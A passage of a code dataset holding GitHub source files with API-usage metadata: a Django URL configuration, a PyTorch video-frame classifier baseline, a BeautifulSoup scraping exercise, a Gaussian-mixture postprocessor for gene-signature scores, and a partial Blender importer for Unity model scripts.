"torch.nn.functional.relu", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "28006594653", "text": "from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path, reverse_lazy\nfrom django.views import defaults as default_views\nfrom django.views.generic import TemplateView\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom djsniper.users import views as accounts_views\n\n\nurlpatterns = [\n #path(\"\", include(\"djsniper.sniper.urls\", namespace=\"sniper\")),\n #path(\"developer/\", include(\"djsniper.developers.urls\", namespace=\"developer\")),\n #path(\"enterprise/\", include(\"djsniper.enterprise.urls\", namespace=\"enterprise\")),\n path(\n \"about/\", TemplateView.as_view(template_name=\"pages/about.html\"), name=\"about\"\n ),\n # Django Admin, use {% url 'admin:index' %}\n path(settings.ADMIN_URL, admin.site.urls),\n # User management\n path(\"users/\", include(\"djsniper.users.urls\", namespace=\"users\")),\n path(\"accounts/\", include(\"allauth.urls\")),\n #path('developer-home/', accounts_views.developer_home, name='developer_home'),\n #path('investor-home/', accounts_views.investor_home, name='investor_home'),\n #path('enterprise-home/', accounts_views.enterprise_home, name='enterprise_home'),\n path(\"celery-progress/\", include(\"celery_progress.urls\")),\n # Your stuff: custom urls includes go here\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# API URLS\nurlpatterns += [\n # API base url\n path(\"api/\", include(\"config.api_router\")),\n # DRF auth token\n path(\"auth-token/\", obtain_auth_token),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n path(\n \"400/\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n path(\n \"403/\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n path(\n \"404/\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n path(\"500/\", default_views.server_error),\n ]\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns = [path(\"__debug__/\", include(debug_toolbar.urls))] + urlpatterns\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n", "repo_name": "alexandraramirezmolano/test", "sub_path": "config/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.settings.ADMIN_URL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.views.obtain_auth_token", "line_number": 35, "usage_type": "argument"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "django.views.defaults.bad_request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 44, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "django.views.defaults.permission_denied", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 49, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "django.views.defaults.page_not_found", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 54, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "django.views.defaults.server_error", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 57, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 59, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 62, "usage_type": "call"}, {"api_name": "debug_toolbar.urls", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 65, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 65, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 66, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 66, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 67, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 68, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 68, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "11577217897", "text": "import os\nimport pickle\nfrom datetime import datetime\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nfrom models import basenet\nfrom models import load_data\nimport utils\n\nclass BasicModel():\n def __init__(self, opt):\n self.epoch = 0\n self.device = opt['device']\n self.save_path = opt['save_folder']\n self.print_freq = opt['print_freq']\n self.init_lr = opt['optimizer_setting']['lr']\n \n self.set_network(opt)\n self.set_data(opt)\n self.set_optimizer(opt)\n self.best_acc = 0.\n\n def set_network(self, opt):\n if opt['input_type'] == 'latefusion': \n print('Initializing model which takes in two frames')\n self.network = basenet.ResNet50(n_classes=opt['output_dim'],\n pretrained=True,\n dropout=opt['dropout']).to(self.device)\n elif opt['input_type'] == 'randomframe' or opt['input_type'] == 'centerframe':\n print('Initializing model which takes in one frame')\n self.network = basenet.ResNet50_base(n_classes=opt['output_dim'],\n pretrained=True, \n dropout=opt['dropout']).to(self.device)\n\n def forward(self, x):\n out, feature = self.network(x)\n return out, feature\n\n def set_data(self, opt):\n \"\"\"Set up the dataloaders\"\"\"\n \n data_setting = opt['data_setting']\n if opt['input_type'] == 'latefusion':\n print('Feeding in first and last frames as input')\n loader_class = load_data.MyDataset_latefusion \n dataset_kwargs = {}\n elif opt['input_type'] == 'randomframe':\n print('Feeding in a random frame as input')\n loader_class = load_data.MyDataset_singleframe\n dataset_kwargs = {'get_random':True} \n elif opt['input_type'] == 'centerframe':\n print('Feeding in center frame as input')\n loader_class = load_data.MyDataset_singleframe\n dataset_kwargs = {'get_random':False}\n self.loader_train = load_data.create_dataset_actual(data_setting['path'], data_setting['train_params'], loader_class, kwargs=dataset_kwargs) \n self.loader_test = load_data.create_dataset_actual(data_setting['path'], data_setting['test_params'], loader_class, split='test', kwargs=dataset_kwargs)\n\n \n def set_optimizer(self, opt):\n optimizer_setting = opt['optimizer_setting']\n self.optimizer = optimizer_setting['optimizer']( \n params=filter(lambda p: p.requires_grad, self.network.parameters()), \n lr=optimizer_setting['lr'],\n weight_decay=optimizer_setting['weight_decay']\n )\n \n def _criterion(self, output, target):\n return F.cross_entropy(output, target)\n \n def state_dict(self):\n state_dict = {\n 'model': self.network.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'epoch': self.epoch\n }\n return state_dict\n\n def log_result(self, name, result, step):\n self.log_writer.add_scalars(name, result, step)\n\n def _train(self, loader):\n \"\"\"Train the model for one epoch\"\"\"\n \n self.network.train()\n \n train_loss = 0\n output_list = []\n target_list = []\n for i, (images, targets) in enumerate(loader):\n images, targets = images.to(self.device), targets.to(self.device)\n #print(images.shape)\n self.optimizer.zero_grad()\n outputs, _ = self.forward(images)\n loss = self._criterion(outputs, targets)\n loss.backward()\n self.optimizer.step()\n\n train_loss += loss.item()\n #self.log_result('Train iteration', {'loss': loss.item()},\n # len(loader)*self.epoch + i)\n\n if self.print_freq and (i % self.print_freq == 0):\n print('Training epoch {}: [{}|{}], loss:{}'.format(\n self.epoch, i+1, len(loader), loss.item()), flush=True)\n \n output_list.append(outputs)\n target_list.append(targets)\n #self.log_result('Train epoch', {'loss': train_loss/len(loader)}, self.epoch)\n self.epoch += 1\n \n return train_loss, torch.cat(output_list), torch.cat(target_list)\n\n def _test(self, loader):\n \"\"\"Compute model output on test set\"\"\"\n \n self.network.eval()\n\n test_loss = 0\n output_list = []\n feature_list = []\n target_list = []\n with torch.no_grad():\n for i, (images, targets) in enumerate(loader):\n images, targets = images.to(self.device), targets.to(self.device)\n outputs, features = self.forward(images)\n loss = self._criterion(outputs, targets)\n test_loss += loss.item()\n\n output_list.append(outputs)\n feature_list.append(features)\n target_list.append(targets)\n\n\n return test_loss, torch.cat(output_list), torch.cat(feature_list), torch.cat(target_list)\n\n def inference(self, output, detach=False):\n predict_prob = torch.sigmoid(output)\n if detach:\n return predict_prob.cpu().detach().numpy()\n return predict_prob.cpu().numpy()\n \n def save_model(self, path):\n torch.save(self.network.state_dict(), path)\n \n def train(self):\n \"\"\"Train the model for one epoch, evaluate on validation set and \n save the best model\n \"\"\"\n \n start_time = datetime.now()\n train_loss, train_output, targets = self._train(self.loader_train)\n train_predict_prob = self.inference(train_output, True)\n train_acc = utils.get_accuracy(train_predict_prob, targets.cpu().numpy(), k=3)\n self.save_model(os.path.join(self.save_path, 'current.pth'))\n \n test_loss, test_output, _ , targets = self._test(self.loader_test)\n test_predict_prob = self.inference(test_output)\n test_acc = utils.get_accuracy(test_predict_prob, targets.cpu().numpy(), k=3)\n if test_acc > self.best_acc:\n self.best_acc = test_acc\n self.save_model(os.path.join(self.save_path,'best.pth'))\n \n\n duration = datetime.now() - start_time\n print('Finish training epoch {}, time used: {}, train_acc: {}, test_acc: {}'.format(self.epoch, duration, train_acc, test_acc))\n\n \n def test(self):\n # Test and save the result\n\n test_loss, test_output, _ , targets= self._test(self.loader_test)\n test_predict_prob = self.inference(test_output)\n \n\n acc = utils.get_accuracy(test_predict_prob, targets.cpu().numpy(), k=3)\n", "repo_name": "felixy12/COS529_Project", "sub_path": "ResNet2D/models/baseline.py", "file_name": "baseline.py", "file_ext": "py", "file_size_in_byte": 6994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.basenet.ResNet50", "line_number": 29, "usage_type": "call"}, {"api_name": "models.basenet", "line_number": 29, "usage_type": "name"}, {"api_name": "models.basenet.ResNet50_base", "line_number": 34, "usage_type": "call"}, {"api_name": "models.basenet", "line_number": 34, "usage_type": "name"}, {"api_name": "models.load_data.MyDataset_latefusion", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.load_data", "line_number": 48, "usage_type": "name"}, {"api_name": "models.load_data.MyDataset_singleframe", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.load_data", "line_number": 52, "usage_type": "name"}, {"api_name": "models.load_data.MyDataset_singleframe", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.load_data", "line_number": 56, "usage_type": "name"}, {"api_name": "models.load_data.create_dataset_actual", "line_number": 58, "usage_type": "call"}, {"api_name": "models.load_data", "line_number": 58, "usage_type": "name"}, {"api_name": "models.load_data.create_dataset_actual", "line_number": 59, "usage_type": "call"}, {"api_name": "models.load_data", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 153, "usage_type": "name"}, {"api_name": "utils.get_accuracy", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "utils.get_accuracy", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 167, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 167, "usage_type": "name"}, {"api_name": "utils.get_accuracy", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "23726312424", "text": "from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://www.pythonscraping.com/pages/page3.html\")\n\nbs = BeautifulSoup(html, \"html.parser\")\n\nfor child in bs.find(\"table\", {\"id\": \"giftList\"}).children:\n print(child)\n\nfor sibling in bs.find(\"table\", {\"id\": \"giftList\"}).tr.next_siblings:\n print(sibling)\n\nprint(bs.find(\"img\", {\"src\": \"../img/gifts/img1.jpg\"}).parent.previous_sibling.get_text())\n", "repo_name": "welderessutti/exercises_and_studies", "sub_path": "web_scraping_with_python_book/navigating_trees.py", "file_name": "navigating_trees.py", "file_ext": "py", "file_size_in_byte": 433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.urlopen", "line_number": 4, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "14021725807", "text": "import os\nimport sys\nfrom typing import List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nfrom anndata import AnnData\nfrom matplotlib import pyplot as plt\nfrom pandas import DataFrame\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.preprocessing import StandardScaler\n\nsys.path.append('../..')\nfrom src.utils.utils import commonPrefix\n\n\ndef check_score_names(adata: AnnData, score_names: List[str]):\n \"\"\"\n Asserts that names associated with score columns exist in the data.\n Args:\n adata: AnnData object containing the gene expression data.\n score_names: Names of score columns\n\n Returns:\n None\n\n Raises:\n Assertion error if any value in `score_names` is not contained in `adata`\n \"\"\"\n assert isinstance(score_names, list) and len(score_names) > 0, \\\n f'score_names needs to be of type list. We need at least one score_name'\n\n assert all([x in adata.obs.columns for x in score_names]), f'score_names conatains names not ' \\\n f'corresponding to columns in adata.obs'\n\n\nclass GMMPostprocessor:\n \"\"\"\n The GMMPostprocessor class is used to correct for incomparable score ranges in gene signature scoring.\n If fits a Gaussian Mixture Model on gene signature scores and assigns clusters to signatures.\n\n Attributes:\n n_components: Defines the number of clusters we expect in the Gaussian Mixture Model. For postprocessing gene\n expression signatures we use n_components=#signatures or n_components=(#signatures+1).\n gmm: Corresponds to the GMM used for postprocessing.\n \"\"\"\n\n def __init__(self, n_components: int = 3, covariance_type: str = 'full', init_params: str = 'k-means++',\n n_init: int = 30):\n \"\"\"\n Args:\n n_components: Number of clusters we expect in the Gaussian Mixture Model.\n covariance_type: The type of covariance used in GMM. Available methods 'full', 'tied', 'diag', 'spherical'.\n init_params: Method to initialize parameters in GMM. Available methods 'kmeans', 'k-means++', 'random',\n 'random_from_data'\n n_init: Number of initializations done.\n \"\"\"\n self.n_components = n_components\n self.covariance_type = covariance_type\n self.init_params = init_params\n self.n_init = n_init\n\n self.gmm = GaussianMixture(n_components=n_components,\n covariance_type=covariance_type,\n init_params=init_params,\n n_init=n_init,\n random_state=0)\n\n def fit_and_predict(self, adata: AnnData, score_names: List[str], store_name: Optional[str] = None,\n inplace: bool = True) -> Union[str, List[str], Optional[DataFrame]]:\n \"\"\"\n The method fits previously initialized GMM on signature scores.\n Args:\n adata: AnnData object containing the gene expression data.\n score_names: Name of signature scores columns on which the GMM is fit.\n store_name: Prefix of new columns with probabilities\n inplace: If probabilities are stored in `adata` or in a new pandas DataFrame\n\n Returns:\n If 'inplace=True', the names of the new columns are returned.\n If 'inplace=False', the names of the new columns and the DataFrame containing the cluster probabilities are\n returned.\n \"\"\"\n if store_name is None:\n store_name = commonPrefix(score_names, 0, len(score_names) - 1)\n print(f'GMM model for {store_name} scores.')\n check_score_names(adata, score_names)\n curr_data = adata.obs[score_names].copy()\n print(f'> standardize data')\n curr_data = StandardScaler().fit_transform(curr_data)\n print(f'> fit and predict probabilities')\n gm_pred = self.gmm.fit_predict(curr_data)\n gm_proba = self.gmm.predict_proba(curr_data)\n\n store_name_pred = store_name + '_GMM_pred'\n store_names_proba = [(store_name + f'_{x}_GMM_proba') for x in range(self.n_components)]\n\n if inplace:\n adata.obs[store_name_pred] = gm_pred\n adata.obs[store_names_proba] = gm_proba\n return store_name_pred, store_names_proba, None\n else:\n pred_and_proba_df = pd.DataFrame(np.hstack([gm_pred.reshape(-1, 1), gm_proba]),\n index=adata.obs.index,\n columns=([store_name_pred] + store_names_proba))\n return store_name_pred, store_names_proba, pred_and_proba_df\n\n def assign_clusters_to_signatures(self, adata: AnnData, score_names: List[str], gmm_proba_names: List[str],\n plot: bool = False, store_plot_path: Optional[str] = None) -> dict:\n \"\"\"\n The methods computed the assignments of GMM clusters to gene expression signatures by computing the correlation\n of each cluster probabilities to the signatures' scores.\n\n Args:\n adata: AnnData object containing the gene expression data.\n score_names: Name of signature scores columns.\n gmm_proba_names: Name of GMM cluster probability columns.\n plot: Plot scatterplots of scores and probabilities for each signature and GMM cluster.\n store_plot_path: Path to location where scatterplots should be stored. If None, plots are not stored.\n\n Returns:\n The assignments of each signature to a cluster from GMM postprocessing.\n\n \"\"\"\n check_score_names(adata, score_names + gmm_proba_names)\n\n signature_group_assignments = {}\n if plot:\n fig, ax = plt.subplots(nrows=len(score_names), ncols=len(gmm_proba_names),\n figsize=(len(gmm_proba_names) * 5, len(score_names) * 5))\n for k, sco in enumerate(score_names):\n max_corr = 0\n max_group = None\n for l, group in enumerate(gmm_proba_names):\n corr = scipy.stats.pearsonr(adata.obs[sco], adata.obs[group])\n print(corr, sco, group)\n if plot:\n ax[k, l].scatter(adata.obs[sco], adata.obs[group])\n x_label = sco.split('_')[-1]\n y_label = '_'.join(group.split('_')[-3:])\n ax[k, l].set_xlabel(x_label)\n ax[k, l].set_ylabel(y_label)\n ax[k, l].set_title(f'corr({x_label}, {y_label})=\\n{corr}')\n # if corr[1] < 0.01 and corr[0] > max_corr:\n if corr[0] > max_corr:\n max_corr = corr[0]\n max_group = group\n signature_group_assignments[sco] = max_group\n if len(set(gmm_proba_names).difference(set(signature_group_assignments.values()))) > 0:\n signature_group_assignments['rest'] = set(gmm_proba_names).difference(\n set(signature_group_assignments.values()))\n if plot:\n fig.subplots_adjust(hspace=0.3)\n store_name = commonPrefix(score_names, 0, len(score_names) - 1)\n fig.suptitle(store_name)\n if store_plot_path is not None:\n fig.savefig(os.path.join(store_plot_path, f'{store_name}scores_vs_proba.png'), format='png')\n\n return signature_group_assignments\n", "repo_name": "BoevaLab/ANS_supplementary_information", "sub_path": "src/scoring_methods/gmm_postprocessing.py", "file_name": "gmm_postprocessing.py", "file_ext": "py", "file_size_in_byte": 7517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "anndata.AnnData", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 64, "usage_type": "call"}, {"api_name": "anndata.AnnData", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 70, "usage_type": "name"}, {"api_name": "src.utils.utils.commonPrefix", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 104, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 71, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "name"}, {"api_name": "anndata.AnnData", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "scipy.stats.pearsonr", "line_number": 136, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 136, "usage_type": "attribute"}, {"api_name": "src.utils.utils.commonPrefix", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}]} +{"seq_id": "15191074188", "text": "bl_info = {\n \"name\": \"Unity Model Script Importer\",\n \"author\": \"ata4\",\n \"version\": (0, 2, 0),\n \"blender\": (2, 6, 0),\n \"location\": \"File > Import-Export\",\n \"description\": \"Imports Unity model scripts exported by the Mesh2BPY script\",\n \"warning\": \"\",\n \"support\": \"COMMUNITY\",\n \"category\": \"Import-Export\",\n }\n\nimport bpy, bmesh, math, re\n\n# ImportHelper is a helper class, defines filename and\n# invoke() function which calls the file selector.\nfrom bpy_extras.io_utils import ImportHelper\nfrom bpy.props import StringProperty, BoolProperty, EnumProperty\nfrom bpy.types import Operator\nfrom mathutils import Vector, Quaternion\n\nclass ImportPythonModel(Operator, ImportHelper):\n \"\"\"This appears in the tooltip of the operator and in the generated docs\"\"\"\n bl_idname = \"import_mesh.unity\"\n bl_label = \"Import Unity model script\"\n\n # ImportHelper mixin class uses this\n filename_ext = \".py\"\n \n def __init__(self):\n self.model = None\n\n def execute(self, context):\n # compile and execute provided script\n script = open(self.filepath).read()\n script_c = compile(script, self.filepath, 'exec')\n globals = {}\n \n exec(script_c, globals)\n \n self.model = globals.get('model')\n \n # test if the \"model\" variable is defined\n if not self.model:\n print(\"No model variable found!\")\n return {'CANCELLED'}\n \n # get rid of \"mesh\" in the model name\n pattern = re.compile(\"mesh\", re.IGNORECASE)\n self.model['name'] = pattern.sub(\"\", self.model['name'])\n \n # build model\n self.build_model()\n\n return {'FINISHED'}\n \n def build_model(self):\n print(\"Building %s\" % self.model['name'])\n \n # create empty\n ob = bpy.data.objects.new(self.model['name'], None)\n ob.rotation_euler = (math.radians(90), 0, 0)\n\n # build mesh\n me = self.build_geometry()\n\n # create mesh object\n ob_mesh = bpy.data.objects.new(self.model['name'] + \" Mesh\", me)\n ob_mesh.location = self.model['pos']\n ob_mesh.rotation_quaternion = self.model['rot']\n #ob_mesh.scale = self.model['scl']\n ob_mesh.parent = ob\n \n # create armature\n amt = bpy.data.armatures.new(self.model['name'])\n amt.show_names = True\n \n # create armature object\n ob_amt = bpy.data.objects.new(self.model['name'] + \" Armature\", amt)\n ob_amt.show_x_ray = True\n ob_amt.draw_type = 'WIRE'\n ob_amt.parent = ob\n \n # Give mesh object an armature modifier, using vertex groups but\n # not envelopes\n mod = ob_mesh.modifiers.new('Armature', 'ARMATURE')\n mod.object = ob_amt\n mod.use_bone_envelopes = False\n mod.use_vertex_groups = True\n \n # link objects to scene\n bpy.context.scene.objects.link(ob)\n bpy.context.scene.objects.link(ob_mesh)\n bpy.context.scene.objects.link(ob_amt)\n \n # build armature\n bpy.context.scene.objects.active = ob_amt\n self.build_armature(ob_mesh, ob_amt)\n \n def build_geometry(self):\n # create mesh data and BMesh\n me = bpy.data.meshes.new(self.model['name'])\n bm = bmesh.new()\n \n # create vertices\n for vert in self.model['verts']:\n bm.verts.new(vert) \n \n # to avoid slow iterator lookups later / indexing verts is slow in bmesh\n bm_verts = bm.verts[:]\n \n # set of indices of duplicate faces\n dupfaces = set()\n \n for submesh_index, submesh in enumerate(self.model['submeshes']):\n # get name of material\n mat_name = self.model['materials'][submesh_index]\n \n # create and append material\n mtl = bpy.data.materials.get(mat_name)\n if not mtl:\n mtl = bpy.data.materials.new(name = mat_name)\n me.materials.append(mtl)\n \n # create faces\n for face_index, face in enumerate(zip(submesh[0::3], submesh[1::3], submesh[2::3])):\n try:\n bm_face = bm.faces.new((bm_verts[i] for i in face))\n bm_face.smooth = True\n bm_face.material_index = submesh_index\n except ValueError as e:\n # duplicate face, save id for later\n print(\"Duplicate face: %d\" % face_index)\n dupfaces.add(face_index)\n \n # create uv layers\n uv_lay = bm.loops.layers.uv.verify()\n face_index_ofs = 0\n for face_index, face_uv in enumerate(self.model['uv']):\n # skip duplicate faces and correct face index\n if face_index in dupfaces:\n face_index_ofs = face_index_ofs - 1\n continue\n \n for loop_index, loop_uv in enumerate(face_uv):\n bm.faces[face_index + face_index_ofs].loops[loop_index][uv_lay].uv = loop_uv\n \n # export BMesh to mesh data\n bm.to_mesh(me)\n me.update()\n \n return me\n \n def build_armature(self, ob_mesh, ob_amt):\n bpy.ops.object.mode_set(mode='EDIT')\n \n # create vertex groups, and add verts and weights\n # first arg in assignment is a list, can assign several verts at once\n for name, vgroup in self.model['vg'].items():\n grp = ob_mesh.vertex_groups.new(name)\n for (v, w) in vgroup:\n grp.add([v], w, 'REPLACE')\n \n # first pass: create and position bones\n for bone_name, bone_data in self.model['bones'].items():\n scale = 1 / self.get_bone_scale(bone_name, 1)\n bone = ob_amt.data.edit_bones.new(bone_name)\n bone.head = bone_data['pos']\n bone.tail = bone.head + Vector((0, scale * -0.1, 0))\n bone.roll = 0\n\n # second pass: build bone hierarchy\n for bone_name, bone_data in self.model['bones'].items():\n bone = ob_amt.data.edit_bones.get(bone_name)\n bone_parent_name = bone_data.get('parent')\n if bone and bone_parent_name:\n bone_parent = ob_amt.data.edit_bones.get(bone_parent_name)\n if bone_parent:\n bone.parent = bone_parent\n \n bpy.ops.object.mode_set(mode='OBJECT')\n \n # create custom shape for bones\n bone_shape = bpy.data.objects.get(\"bone_shape\")\n if not bone_shape:\n bone_shape = bpy.ops.object.empty_add(type='SPHERE')\n bone_shape = 